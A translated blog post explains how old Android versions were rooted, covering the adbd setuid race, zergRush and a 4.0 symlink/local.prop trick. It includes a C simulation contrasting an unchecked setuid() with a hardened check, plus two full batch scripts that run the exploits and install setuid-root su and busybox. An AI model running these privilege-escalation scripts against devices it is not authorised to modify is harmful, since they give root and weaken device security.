  • Thoughts on rooting Android

    1 On Android almost anything you want to do runs into permission limits, so you frequently need to obtain root.

    2 The ways of obtaining root on Android are not all the same, because they are dictated by vulnerabilities in the Android source code. Obtaining root means exploiting a vulnerability in the Android system; different versions have different vulnerabilities, so the rooting method differs from version to version.

    3 The final step of rooting Android is always the same: place a setuid-root su binary in /system/bin or /system/xbin, put a busybox binary in /system/xbin, and install SuperUser.apk to manage which apps are allowed to use su.

    4 Vulnerabilities by Android version include the following:

      1 adbd starts as root and drops to the shell uid with setuid(), but it never checks whether that call succeeded. The exploit abuses the per-user process limit (RLIMIT_NPROC) of the shell uid: it fork()s new processes until the limit is reached, then kills adbd so that it is restarted; in the new adbd the setuid() fails, the privilege drop is silently skipped, and adbd keeps serving as root. (This is the exploit known as RageAgainstTheCage.)

      2 zergRush exploit: a stack buffer overflow in libsysutils, reached through the vold socket on Android 2.2/2.3. It needs the zergRush executable pushed to and run on the device.

      3

      4 Android 4.0 root: the symlink trick. /data/local/tmp belongs to the shell user, so adb shell can replace it with a symlink to /data; on the next boot init's chown of /data/local/tmp follows the link and makes /data itself writable by shell. A /data/local.prop containing ro.kernel.qemu=1 then makes the following boot treat the device as an emulator, so adbd starts as root and /system can be remounted read-write (see the Android 4.0 script below).
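The mechanism in item 1 reduces to one unchecked system call. The C program below is an added example written for this page, not code from the original post or from adbd: it models an adbd-style privilege drop once with the return value of setuid() ignored and once with it checked, against a simulated setuid() that fails with EAGAIN when the shell uid has hit its process limit. The struct sim, sim_setuid, saturate_shell_procs, the limit of 4 and the use of uid 2000 (AID_SHELL) are all assumptions made so that the program runs as an ordinary user without fork-bombing the host.

```c
/* Added example (not from the original post or from adbd): the unchecked
 * setuid() pattern behind the adbd exploit, next to a hardened version.
 * The real exploit exhausts the shell uid's RLIMIT_NPROC with fork() and
 * restarts adbd so that its setuid(AID_SHELL) fails; here the failing
 * setuid() is simulated so the code runs unprivileged and offline. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

#define AID_SHELL 2000u   /* the uid adbd is supposed to drop to (assumed) */

/* Simulated process state: current uid, shell process count, NPROC limit. */
struct sim {
    uid_t uid;
    int   shell_procs;
    int   nproc_limit;
};

/* Simulated setuid(): like kernels of that era, refuses the switch with
 * EAGAIN when the target uid already has RLIMIT_NPROC processes. */
static int sim_setuid(struct sim *s, uid_t target)
{
    if (target == AID_SHELL && s->shell_procs >= s->nproc_limit) {
        errno = EAGAIN;
        return -1;
    }
    s->uid = target;
    return 0;
}

/* Vulnerable pattern: privileges are "dropped" without looking at the
 * result, so the daemon keeps running as root when setuid() fails.
 * Returns the uid the daemon actually serves with. */
uid_t adbd_start_vulnerable(struct sim *s)
{
    sim_setuid(s, AID_SHELL);   /* return value ignored */
    return s->uid;
}

/* Hardened pattern: check the return value and re-read the uid before
 * serving anything. Returns the serving uid, or (uid_t)-1 to mean "exit". */
uid_t adbd_start_hardened(struct sim *s)
{
    if (sim_setuid(s, AID_SHELL) != 0) {
        perror("setuid");
        return (uid_t)-1;       /* never serve as root */
    }
    if (s->uid != AID_SHELL)    /* verify the switch really took */
        return (uid_t)-1;
    return s->uid;
}

/* Attacker half: fill the shell uid's process count up to the limit, as the
 * exploit does with repeated fork(); simulated here. */
void saturate_shell_procs(struct sim *s)
{
    while (s->shell_procs < s->nproc_limit)
        s->shell_procs++;
}

int main(void)
{
    struct sim s = { .uid = 0, .shell_procs = 0, .nproc_limit = 4 };
    printf("normal boot: vulnerable adbd serves as uid %u\n",
           (unsigned)adbd_start_vulnerable(&s));

    s.uid = 0;
    saturate_shell_procs(&s);               /* attacker fork()s to the limit */
    printf("after fork-to-limit: vulnerable adbd serves as uid %u\n",
           (unsigned)adbd_start_vulnerable(&s));   /* stays 0: root shell */

    s.uid = 0;
    uid_t u = adbd_start_hardened(&s);
    printf("after fork-to-limit: hardened adbd %s\n",
           u == (uid_t)-1 ? "refuses to start" : "serves unprivileged");
    return 0;
}
```

Compile with cc -o adbd_drop adbd_drop.c and run it: the vulnerable variant reports uid 0 once the shell process count is saturated, the hardened one refuses to start. One caveat: on Linux 3.1 and later the RLIMIT_NPROC check moved from setuid() to execve(), so a real setuid() no longer fails this particular way; checking its return value is still mandatory, because setuid() can fail for other reasons.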

     

     

    5 The rooting commands are as follows:

     zergRush exploit (DooMLoRD's Windows batch toolkit):

    @echo ---------------------------------------------------------------
    @echo               Easy rooting toolkit (v1.0)
    @echo                    created by DooMLoRD
    @echo         using exploit zergRush (Revolutionary Team)
    @echo    Credits go to all those involved in making this possible!
    @echo ---------------------------------------------------------------
    @echo  [*] This script will:
    @echo      (1) root ur device using zergRush exploit
    @echo      (2) install Busybox (1.18.4)
    @echo      (3) install SU files (3.0.5)
    @echo  [*] Before u begin:
    @echo      (1) make sure u have installed adb drivers for ur device
    @echo      (2) enable "USB DEBUGGING"
    @echo            from (Menu\Settings\Applications\Development)
    @echo      (3) enable "UNKNOWN SOURCES"
    @echo            from (Menu\Settings\Applications)
    @echo      (4) [OPTIONAL] increase screen timeout to 10 minutes
    @echo      (5) connect USB cable to PHONE and then connect to PC
    @echo      (6) skip "PC Companion Software" prompt on device
    @echo ---------------------------------------------------------------
    @echo  CONFIRM ALL THE ABOVE THEN
    @pause
    @echo --- STARTING ----
    @echo --- WAITING FOR DEVICE
    @files\adb wait-for-device
    @echo --- cleaning
    @files\adb shell "cd /data/local/tmp/; rm *"
    @echo --- pushing zergRush
    @rem /data/local/tmp is the only place the unprivileged shell user can write and execute
    @files\adb push files\zergRush /data/local/tmp/.
    @echo --- correcting permissions
    @files\adb shell "chmod 777 /data/local/tmp/zergRush"
    @echo --- executing zergRush
    @rem on success adbd comes back as root, which is what the reconnect below waits for
    @files\adb shell "/data/local/tmp/zergRush"
    @echo --- WAITING FOR DEVICE TO RECONNECT
    @echo if it gets stuck over here for a long time then try:
    @echo    disconnect usb cable and reconnect it
    @echo    toggle "USB DEBUGGING" (first disable it then enable it)
    @echo --- DEVICE FOUND
    @files\adb wait-for-device
    @echo --- pushing busybox
    @files\adb push files\busybox /data/local/tmp/.
    @echo --- correcting permissions
    @files\adb shell "chmod 755 /data/local/tmp/busybox"
    @echo --- remounting /system
    @files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
    @echo --- copying busybox to /system/xbin/
    @files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
    @echo --- correcting ownership
    @files\adb shell "chown root.shell /system/xbin/busybox"
    @echo --- correcting permissions
    @rem the toolkit ships busybox setuid root (04755); that turns every applet into a root
    @rem shell for any app, so a plain 0755 is the safer choice once su is installed
    @files\adb shell "chmod 04755 /system/xbin/busybox"
    @echo --- installing busybox
    @files\adb shell "/system/xbin/busybox --install -s /system/xbin"
    @files\adb shell "rm -r /data/local/tmp/busybox"
    @echo --- pushing SU binary
    @files\adb push files\su /system/bin/su
    @echo --- correcting ownership
    @files\adb shell "chown root.shell /system/bin/su"
    @echo --- correcting permissions
    @rem 06755 = setuid + setgid + rwxr-xr-x: this is what makes su hand out root
    @files\adb shell "chmod 06755 /system/bin/su"
    @echo --- correcting symlinks
    @files\adb shell "rm /system/xbin/su"
    @files\adb shell "ln -s /system/bin/su /system/xbin/su"
    @echo --- pushing Superuser app
    @files\adb push files\Superuser.apk /system/app/.
    @echo --- cleaning
    @files\adb shell "cd /data/local/tmp/; rm *"
    @echo --- rebooting
    @files\adb reboot
    @echo ALL DONE!!!
    @pause

     

    On Android 4.0 (zopo008's batch script):

    @echo off

    cls
    echo.
    echo by zopo008 (visit bbs.zopomobile.com)
    echo.
    echo.
    rem Step 1: /data/local/tmp is owned by the shell user, so adb shell may replace it
    rem with a symlink to /data. On the next boot init's "mkdir /data/local/tmp 0771
    rem shell shell" follows the link and hands /data itself to the shell user.
    adb shell mv /data/local/tmp /data/local/tmp.bak
    adb shell ln -s /data /data/local/tmp
    adb reboot
    echo Rebooting (1/3) - Continue once device finishes rebooting
    pause

    rem Step 2: with /data writable, drop a local.prop that marks the device as an
    rem emulator; init then starts adbd as root instead of dropping it to shell.
    adb shell rm /data/local.prop > nul
    adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
    adb reboot
    echo Rebooting (2/3) - Continue once device finishes rebooting
    pause

    rem Step 3: confirm that adbd really is root before touching /system.
    adb shell id
    echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
    pause

    rem Step 4: remount /system and install su (setuid root), busybox and the apps.
    adb remount
    adb push su /system/bin/su
    adb shell chown 0.0 /system/bin/su
    adb shell chmod 06755 /system/bin/su
    adb push busybox /system/bin/busybox
    adb shell chown 0.0 /system/bin/busybox
    adb shell chmod 0755 /system/bin/busybox
    adb push Superuser.apk /system/app/Superuser.apk
    adb shell chown 0.0 /system/app/Superuser.apk
    adb shell chmod 0644 /system/app/Superuser.apk
    adb push RootExplorer.apk /system/app/RootExplorer.apk
    adb shell chown 0.0 /system/app/RootExplorer.apk
    adb shell chmod 0644 /system/app/RootExplorer.apk
    rem Step 5: undo the symlink and the local.prop so that only su remains.
    echo Removing changes except ROOT
    adb shell rm /data/local.prop
    adb shell rm /data/local/tmp
    adb shell mv /data/local/tmp.bak /data/local/tmp
    adb reboot

    echo Rebooting (3/3) - You should now be Rooted
    pause

    echo on

  • Original source: https://www.cnblogs.com/jackrex/p/3001405.html